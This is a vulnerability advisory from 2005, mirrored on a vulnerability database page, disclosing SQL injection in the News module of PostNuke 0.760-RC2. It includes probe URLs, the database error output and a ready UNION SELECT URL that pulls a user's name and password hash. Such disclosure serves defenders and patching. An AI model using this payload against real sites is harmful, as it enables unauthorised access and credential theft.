Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

postnukeSQL0760.txt

🗓️ 01 Mar 2005 00:00:00Reported by Maksymilian ArciemowiczType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 48 Views

PostNuke 0.760-RC2 is vulnerable to critical SQL injection in getArticles function within News module.

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
[PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1]  
  
Author: cXIb8O3(Maksymilian Arciemowicz)  
Date: 15.2.2005  
from securityreason.com TEAM  
  
- --- 0.Description ---  
  
PostNuke: The Phoenix Release (0.760-RC2=>x)  
  
PostNuke is an open source, open developement content management system  
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and  
provides many enhancements and improvements over the PHP-Nuke system. PostNuke  
is still undergoing development but a large number of core functions are now  
stabilising and a complete API for third-party developers is now in place.  
If you would like to help develop this software, please visit our homepage  
at http://noc.postnuke.com/  
You can also visit us on our IRC Server irc.postnuke.com channel  
#postnuke-support  
#postnuke-chat  
#postnuke  
Or at the Community Forums located at:  
http://forums.postnuke.com/  
  
  
- --- 1. Critical SQL INJECTION ---  
This SQL INJECTION is in modules/News/funcs.php in function getArticles(). When this function is active(Other Stories), we can add sql querty in varible catid.   
  
For exemple:  
  
http://[HOST]/[DIR]/index.php?catid='cXIb8O3  
  
Error message :  
- ---------------  
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23  
- ---------------  
  
http://[HOST]/[DIR]/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3  
  
Error message :  
- ---------------  
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23  
- ---------------  
  
http://[HOST]/[DIR]/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3  
  
Error message :  
- ---------------  
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23  
- ---------------  
  
etc.  
  
and varible $query is:  
  
- ---------------  
SELECT pn__stories.pn_aid AS "aid", pn__stories.pn_bodytext AS "bodytext", pn__stories_cat.pn_themeoverride AS "catthemeoverride", pn__stories.pn_catid AS "cid", pn__stories_cat.pn_title AS "cattitle", pn__stories.pn_comments AS "comments", pn__stories.pn_counter AS "counter", pn__stories.pn_hometext AS "hometext", pn__stories.pn_informant AS "informant", pn__stories.pn_notes AS "notes", pn__stories.pn_sid AS "sid", pn__stories.pn_themeoverride AS "themeoverride", pn__topics.pn_topicid AS "tid", pn__stories.pn_time AS "time", pn__stories.pn_title AS "title", pn__topics.pn_topicname AS "topicname", pn__topics.pn_topicimage AS "topicimage", pn__topics.pn_topictext AS "topictext", pn__topics.pn_counter AS "tcounter", pn__stories.pn_time AS "unixtime", pn__stories.pn_withcomm AS "withcomm" FROM pn__stories LEFT JOIN pn__stories_cat ON pn__stories.pn_catid = pn__stories_cat.pn_catid LEFT JOIN pn__topics ON pn__stories.pn_topic = pn__topics.pn_topicid WHERE (pn__stories.pn_language  
='eng' OR pn__stories.pn_language='') AND pn__stories.pn_catid='cXIb8O3 ORDER BY pn__stories.pn_time DESC  
- ---------------  
  
Exploit:  
This exploit get password from user with id=2. But frist check prefix.   
  
Step 1.  
http://[HOST]/[DIR]/index.php?catid='cXIb8O3  
  
Error message :  
- ---------------  
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23  
- ---------------  
  
and pn_ is that prefix.  
  
Step 2.  
http://[HOST]/[DIR]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE%20pn_uid=2/*   
  
- --- 2. How to fix ---  
  
Download the new version of the script or update.  
  
- --- 3. Greets ---  
  
Only for sp3x..  
  
- --- 4.Contact ---  
Author: Maksymilian Arciemowicz  
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)  
Email: max [at] jestsuper [dot] pl  
GPG-KEY: http://security.jestsuper.pl  
SECURITYREASON.COM TEAM  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.2.6 (FreeBSD)  
  
iD8DBQFCI3q4znmvyJCR4zQRAgiQAJ4w/H6sa4jeEgQttYjERpWoIfbscQCglFe4  
/6PJBa0Rgiz5/SnDGnGsjZY=  
=tr+q  
-----END PGP SIGNATURE-----  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4
postnukesql injectioncritical vulnerabilityopen source cmsnews moduledevelopment update.
48
.json
Report